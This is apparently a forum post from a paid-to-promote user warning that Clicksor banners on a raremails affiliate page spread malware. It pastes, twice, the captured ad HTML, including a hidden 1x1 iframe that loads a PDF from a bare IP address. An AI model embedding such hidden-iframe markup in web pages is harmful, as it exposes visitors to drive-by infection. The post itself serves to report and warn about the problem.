Then a few weeks ago, Anyyan put the Clicksor banners back on raremails. I soon established the especialads virus was still in there, so I wrote him a note to let him know. He did not reply and left the clicksor on there.
Tonight I hit a raremails aff page in a PTP page, my computer went all slow and the hard drive churned. I got suspicious/worried. Then my AVG popped up saying there was Virus Pakes on my computer.
It came from the Clicksor banner on the raremails aff page...
CODE
script type="text/javascript">
</script>
<script src="http://ads.clicksor.com/showAd.php?pid=3406&adtype=2&sid=10063&zone=" type="text/javascript">
</script>
<div id="clka87_82" align="center" style="width: 468px; height: 60px;">
<div>
<iframe width="468" scrolling="no" height="60" frameborder="0" marginheight="0" marginwidth="0" src="http://ads.clicksor.com/serving/flashStage.php?zone=&chad=1&cs=&adtype=2&sid=10063&pid=3406&uid=24650523159418&adu=1&image=2&c1=%2399CC33&c2=%23FFFFFF&c3=%23000000&c4=%23666666&memkey=d42e6d65c69cbf7d534a84e119f0dd67&bdurl=http%3A%2F%2Fwww.fusionmails.com%2Fscripts%2Frunner.php%3FGA%3Dmain&ref=http%3A%2F%2Fwww.raremails.com%2Fscripts%2Frunner.php%3FGA%3Daffiliate&qp=%60%5E%25%284%FB%24%27%24%F9%22%2F%FD%21%2F%7E&url=http%3A%2F%2Fads.clicksor.com%2Fserving%2Fshowit.php%3Fzone%3D%26chad%3D1%26cs%3D%26adtype%3D2%26sid%3D10063%26pid%3D3406%26uid%3D24650523159418%26adu%3D1%26image%3D2%26c1%3D%252399CC33%26c2%3D%2523FFFFFF%26c3%3D%2523000000%26c4%3D%2523666666%26memkey%3Dd42e6d65c69cbf7d534a84e119f0dd67%26bdurl%3Dhttp%253A%252F%252Fwww.fusionmails.com%252Fscripts%252Frunner.php%253FGA%253Dmain%26ref%3Dhttp%253A%252F%252Fwww.raremails.com%252Fscripts%252Frunner.php%253FGA%253Daffiliate%26qp%3D%2560%255E%2525%25284%25FB%2524%2527%2524%25F9%2522%252F%25FD%2521%252F%257E%26in_id%3D&width=468&height=60&pid=3406&sid=10063&nid=1&zone=">
<html>
<head>
</head>
<body marginwidth="0" marginheight="0" bgcolor="#ffffff" topmargin="0" leftmargin="0">
<script language="JavaScript">
</script>
<object id="FLASH_AD" width="468" height="60" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
</object>
<script src="http://hostzone2.h.advra.net/1384889/flashwrite_1_2.js" style="outline-color: invert; outline-style: none; outline-width: medium;">
</script>
<script src="http://hostzone2.h.advra.net/1384889/adobef" type="text/javascript" language="javascript">
</script>
<iframe width="1" height="1" src="http://78.109.18.210/1r.pdf" style="visibility: hidden ! important;">
</iframe>
<noscript><A TARGET="_blank" HREF="http://www.productsandservices.bt.com/consumerProducts/displayTopic.do?topicId=23734&s_cid=con_display_zedmedia_callsandlines_vidZ01_Q1&vendorid=S33"><IMG SRC="http://hostzone2.h.advra.net/1384889/BTC_Standard_Q2_Voice_Receipt_Retention_468x60.gif" alt="" BORDER=0></A></noscript>
</body>
</script>
<script src="http://ads.clicksor.com/showAd.php?pid=3406&adtype=2&sid=10063&zone=" type="text/javascript">
</script>
<div id="clka87_82" align="center" style="width: 468px; height: 60px;">
<div>
<iframe width="468" scrolling="no" height="60" frameborder="0" marginheight="0" marginwidth="0" src="http://ads.clicksor.com/serving/flashStage.php?zone=&chad=1&cs=&adtype=2&sid=10063&pid=3406&uid=24650523159418&adu=1&image=2&c1=%2399CC33&c2=%23FFFFFF&c3=%23000000&c4=%23666666&memkey=d42e6d65c69cbf7d534a84e119f0dd67&bdurl=http%3A%2F%2Fwww.fusionmails.com%2Fscripts%2Frunner.php%3FGA%3Dmain&ref=http%3A%2F%2Fwww.raremails.com%2Fscripts%2Frunner.php%3FGA%3Daffiliate&qp=%60%5E%25%284%FB%24%27%24%F9%22%2F%FD%21%2F%7E&url=http%3A%2F%2Fads.clicksor.com%2Fserving%2Fshowit.php%3Fzone%3D%26chad%3D1%26cs%3D%26adtype%3D2%26sid%3D10063%26pid%3D3406%26uid%3D24650523159418%26adu%3D1%26image%3D2%26c1%3D%252399CC33%26c2%3D%2523FFFFFF%26c3%3D%2523000000%26c4%3D%2523666666%26memkey%3Dd42e6d65c69cbf7d534a84e119f0dd67%26bdurl%3Dhttp%253A%252F%252Fwww.fusionmails.com%252Fscripts%252Frunner.php%253FGA%253Dmain%26ref%3Dhttp%253A%252F%252Fwww.raremails.com%252Fscripts%252Frunner.php%253FGA%253Daffiliate%26qp%3D%2560%255E%2525%25284%25FB%2524%2527%2524%25F9%2522%252F%25FD%2521%252F%257E%26in_id%3D&width=468&height=60&pid=3406&sid=10063&nid=1&zone=">
<html>
<head>
</head>
<body marginwidth="0" marginheight="0" bgcolor="#ffffff" topmargin="0" leftmargin="0">
<script language="JavaScript">
</script>
<object id="FLASH_AD" width="468" height="60" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
</object>
<script src="http://hostzone2.h.advra.net/1384889/flashwrite_1_2.js" style="outline-color: invert; outline-style: none; outline-width: medium;">
</script>
<script src="http://hostzone2.h.advra.net/1384889/adobef" type="text/javascript" language="javascript">
</script>
<iframe width="1" height="1" src="http://78.109.18.210/1r.pdf" style="visibility: hidden ! important;">
</iframe>
<noscript><A TARGET="_blank" HREF="http://www.productsandservices.bt.com/consumerProducts/displayTopic.do?topicId=23734&s_cid=con_display_zedmedia_callsandlines_vidZ01_Q1&vendorid=S33"><IMG SRC="http://hostzone2.h.advra.net/1384889/BTC_Standard_Q2_Voice_Receipt_Retention_468x60.gif" alt="" BORDER=0></A></noscript>
</body>
Another thing is that only one PO who I sent an abuse report to who had the Rare aff page in their PTP with the virus actually responded. It is impossible that I am the only one getting these banners with the viruses targeted solely to me as Anyyan seemed to try to imply. You don't get a choice about visiting Raremails aff pages like you do PTP pages, they are inside the PTP rotators so you could get them any time unexpectedly and as long as this Clicksor is on there and Clicksor do nothing to remove this channel for the virus spreaders all PTR members computers are at risk.
NB I did write to Clicksor as well as Raremails and got no reply from Clicksor either. There is also confirmation of the especialads viruses in malware forums stating and showing how it comes through Clicksor.
